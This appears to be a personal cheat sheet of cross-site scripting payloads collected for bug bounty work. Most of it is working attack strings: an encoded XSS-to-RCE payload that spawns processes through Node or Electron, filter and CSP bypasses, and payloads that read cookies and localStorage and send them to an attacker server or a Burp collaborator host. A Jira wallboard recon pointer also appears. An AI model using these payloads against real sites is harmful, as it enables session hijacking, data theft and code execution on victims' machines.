asdassdfsdf


This tutorial is licensed under CC BY 4.0. Please refer to the license text if you wish to reuse, share or remix the content contained within this tutorial.

xss to rce payload:

">'><img src=x onerror=writeln(String.fromCharCode(60,115,99,114,105,112,116,62,10,118,97,114,32,80,114,111,99,101,115,115,32,61,32,112,114,111,99,101,115,115,46,98,105,110,100,105,110,103,40,39,112,114,111,99,101,115,115,95,119,114,97,112,39,41,46,80,114,111,99,101,115,115,59,10,118,97,114,32,112,114,111,99,32,61,32,110,101,119,32,80,114,111,99,101,115,115,40,41,59,10,112,114,111,99,46,111,110,101,120,105,116,32,61,32,102,117,110,99,116,105,111,110,40,97,44,98,41,32,123,125,59,10,118,97,114,32,101,110,118,32,61,32,112,114,111,99,101,115,115,46,101,110,118,59,10,118,97,114,32,101,110,118,95,32,61,32,91,93,59,10,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,101,110,118,41,32,101,110,118,95,46,112,117,115,104,40,107,101,121,43,39,61,39,43,101,110,118,91,107,101,121,93,41,59,10,112,114,111,99,46,115,112,97,119,110,40,123,102,105,108,101,58,39,47,117,115,114,47,98,105,110,47,103,110,111,109,101,45,99,97,108,99,117,108,97,116,111,114,39,44,99,119,100,58,110,117,108,108,44,119,105,110,100,111,119,115,86,101,114,98,97,116,105,109,65,114,103,117,109,101,110,116,115,58,102,97,108,115,101,44,100,101,116,97,99,104,101,100,58,102,97,108,115,101,44,101,110,118,80,97,105,114,115,58,101,110,118,95,44,115,116,100,105,111,58,91,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,44,123,116,121,112,101,58,39,105,103,110,111,114,101,39,125,93,125,41,59,10,60,47,115,99,114,105,112,116,62))>

same rce

<a onmouseover="try{ const {shell} = require('electron'); shell.openExternal('file:C:/Windows/System32/calc.exe') }catch(e){alert(e)}">Harmless Link</a>

<script+class=whoami>window.open("Calculator:///");</script>

jira xss bug: check wallboard in recon

victomhost/plugins/servlet/Wallboard

saki'"><svg><animatetransform src=x onbegin=alert(1)>

'"><svg><animate onbegin=alert(document.domain) attributeName=x></svg>

<math href="javascript:alert(document.cookie)">CLICKME</math>

script><svg/onload=prompt`{document.cookie}`>

html injection:

</h1><h3><mark><a href="https://example.com">e x a m p l e . c o m </a></mark></h3>

<a href=[0x0b]xss" onfocus=prompt(1) autofocus fragment="

Bug Bounty Tips:

Here is an XSS payload that steals both cookies and local storage data:

<svg/onload='const url = `https://yourserver/collect?cookie=${encodeURIComponent(document.cookie)}&localStorage=${encodeURIComponent(JSON.stringify(localStorage))}`; fetch(url);'>"

Bug: XSS to information disclosure.

I have used a double URL-encoded version of this payload:

<img src="x" onerror="fetch('http://yourserver/?cookie=' + encodeURIComponent(document.cookie));">

CSP BYPASS:

%3C/script%20%3E

2- mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E

challenge-0622.intigriti.io/challenge/index.php

'">👉<a/href='jav&Tab;ascript:throw/lauritz/'>click<!--

<a/href=”j&#97v&#97script&#x3A;&#97lert(document.cookie)”>ClickMe

‘“><img src=x onerror=fetch(‘//ra54f7ltuq8q8i7ym90odj9zgqmga5.burpcollaborator.net/?c=’%2Bdocument.cookie)>

?url=http://me6.com/aem/xss2.svg

My fav bypass XSS payload (works 99% of the time):

'"()%26%25<yes><%2Fscript><script>alert(document.c00kiE)<%2Fscript>
